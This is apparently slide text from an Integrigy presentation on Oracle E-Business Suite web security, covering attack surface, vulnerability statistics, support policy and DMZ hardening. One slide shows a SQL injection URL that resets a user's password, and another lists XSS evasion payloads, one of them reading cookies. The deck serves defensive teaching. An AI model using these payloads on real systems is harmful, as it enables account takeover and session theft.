Professional Documents
Culture Documents
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
About Integrigy
Products Services
Verify
Security Security Assessments
AppSentry
Validates
Security ERP, Database, Sensitive Data, Pen Testing
ERP Application and Database
Security Auditing Tool Ensure
Compliance Compliance Assistance
SOX, PCI, HIPAA
AppDefend
Protects
Oracle EBS
Build
Enterprise Application Firewall Security Security Design Services
for the Oracle E-Business Suite
Auditing, Encryption, DMZ
You
Agenda
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
Oracle EBS R12 Web Footprint
OA Framework
http or
11,600 pages
https SQL*Net
Client Apache
Core Servlets Database
Browser
OC4J
30 servlet classes APPS
Oracle Forms
4,000 forms
Oracle EBS installs all modules (250+) and all web pages for every application server
All web pages access the database using the APPS database account
Oracle EBS 11i Web Footprint
Modplsql
850 database packages
Java Servlets
105 servlet classes
Oracle Forms
4,400 forms
Oracle EBS installs all modules (250+) and all web pages for every application server
All web pages access the database using the APPS database account
Oracle EBS 11i Web Footprint
Desupported
Oracle Application Server 9iAS
~2005
Modplsql Removed
850 database packages in R12
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
OWASP Top 10 – 2013 Edition
A2: Broken
A4: Insecure
Authentication A3: Cross Site
A1: Injection Direct Object
and Session Scripting (XSS)
References
Management
http://www.owasp.org/index.php/Top_10
WASC Threat Classification v2.0
http://www.webappsec.org
SQL Injection Explained
http://<server>/pls/VIS/fnd_gfm.dispatch?
p_path=fnd_help.get/US/fnd/@search');%20
fnd_user_pkg.updateUser('operations',%20'
SEED',%20'welcome1
<script>alert(0)</script>
<img src="x:x" onerror="alert(0)">
<iframe src="javascript:alert(0)">
<object data="javascript:alert(0)">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<isindex type=image src=1 onerror=alert(0)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
with(document)alert(cookie)
eval(document.referrer.slice(10));
(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å) [Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()
[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)
</a onmousemove="alert(1)">
data:text/html,<script>alert(0)</script>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
<ScRIPT x src=//0x.lv?
Cross Site Scripting References
416
Oracle EBS Web Vulnerabilities Fixed
~35 Authorization/Authentication
A2: Broken
A4: Insecure
Authentication A3: Cross Site
A1: Injection Direct Object
and Session Scripting (XSS)
References
Management
Medium Risk
Low Risk
WASC TC – Oracle EBS Mapping
NO security patches
NO Critical Patch Updates
Sustaining
Indefinite as long as pay annual maintenance
(desupport) Requires a minimum patch level – usually the
terminal patchset or set of patches
Source: http://www.oracle.com/us/support/lifetime-support/index.html
Oracle E-Business Suite Version Support
1. Extended support requires a minimum baseline patch level – see MOS Note ID 1195034.1.
2. After January 2016, CPUs are available for customers with Advanced Support Contracts.
3. 11.5.10 Sustaining support exception through January 2016 provides CPUs.
Oracle EBS Extended Support Requirements
EBS 12.2.3
12.2
R12.AD.C.DELTA.7
Basically 12.1.3
12.1
Application Server 10.1.3.5
EBS 12.0.6
12.0 Application Server 10.1.2.3 & 10.1.3.5
Java 6
Source: MOS Note ID 1195034.1 - Oracle E-Business Suite Error Correction Support Policy (V.5 – January 2015)
100
150
200
250
0
50
Jan-08
Apr-08
Jul-08
No Support
11.5.9
Oct-08
Jan-09
Apr-09
Jul-09
Oct-09
Jan-10
Required
11.5.10 RUP 6
Apr-10
Jul-10
Oct-10
Jan-11
Apr-11
Jul-11
Oct-11
Jan-12
Baseline Required
11.5.10.2 Minimum
Apr-12
Jul-12
Oct-12
Jan-13
Apr-13
Jul-13
Oct-13
Jan-14
Apr-14
Jul-14
Oct-14
Jan-15
Apr-15
Jul-15
12.0.x Desupport
Oct-15
EBS Cumulative Vulnerabilities per Version
Jan-16
57
208
177
155
12.0.x
11.5.9
11.5.10
11.5.10.2
Inherent Risks with Package Software
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
Oracle EBS SQL Injection – January 2016
Package and/or
Remote Exploit
Vuln # Component Protocol Privilege
without Auth.?
Required
CVE-2016-0545 Customer Intel HTTP Data Issues Yes
CVSS VERSION 2.0 RISK
Last Affected
Patch set (per
Base Access
Access Vector Authentication Confidentiality Integrity Availability Supported
Score Complexity
Release)
11.5.10.2
12.0.x
6.4 Network Low None Partial+ Partial+ None
12.1.x
12.2.x
Oracle EBS
CVE ID Vulnerability Information
Versions
Oracle EBS
CVE ID Vulnerability Information
Versions
Oracle EBS
CVE ID Vulnerability Information
Versions
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
Oracle EBS DMZ Metalink Notes
https://supplier.example.com
EBS EBS
SSL EBS
443 Reverse 8000 External 1521 1521 Internal
HTTP Database
A Proxy App App
SSL SQL*Net SQL*Net
Server
Server Server
External
Users
(supplier)
A
HTTPS/SSL should always be used otherwise passwords and data are sent in the clear.
B
A reverse proxy server should be implemented such as Apache, Blue Coat, or F5 BIG-IP.
Firewall between layers block access between layers except for explicitly defined ports.
C
Oracle EBS DMZ Configuration
URL Firewall
https
Client Apache
3 30Core Servlets Database
Browser
OC4J
servlet classes APPS
1 Oracle Forms
4,000 forms
Proper DMZ configuration reduces accessible pages and responsibilities to only those
required for external access. Reducing the application surface area eliminates possible
exploiting of vulnerabilities in non-external modules.
DMZ Step Appendix E – URL Firewall
OA Framework (OA/RF.jsp)
11,600 pages
URL Firewall
https sqlnet
Client Apache
3 30Core Servlets Database
Browser
OC4J
servlet classes APPS
Oracle Forms
4,000 forms
Node
OA Framework (OA/RF.jsp)
Trust
11,600 pages
250 Level
https
Client Apache
Core Servlets Database
Browser
OC4J 30 servlet classes APPS
Oracle Forms
4,000 forms
Step 5.2 is set the NODE_TRUST_LEVEL to EXTERNAL for the external application server.
Step 5.3 limits the responsibilities accessible via the external application server.
DMZ Configuration
Node
OA Framework (OA/RF.jsp)
Trust
11,600 pages
250 Level
URL Firewall
https
Client Apache
3 30Core Servlets Database
Browser
OC4J
servlet classes APPS
Oracle Forms
4,000 forms
Proper DMZ configuration reduces accessible pages and responsibilities to only those
required for external access. Reducing the application surface area eliminates possible
exploiting of vulnerabilities in non-external modules.
Oracle EBS DMZ Certified Modules (R12)
Vulnerabilities
Oracle EBS Examined Q&A
1 2 3 4 5
Web Application Oracle EBS DMZ
Security Implementation
Contact Information
web: www.integrigy.com
Stephen Kost
e-mail: info@integrigy.com
Chief Technology Officer
blog: integrigy.com/oracle-security-blog
Integrigy Corporation
youtube: youtube.com/integrigy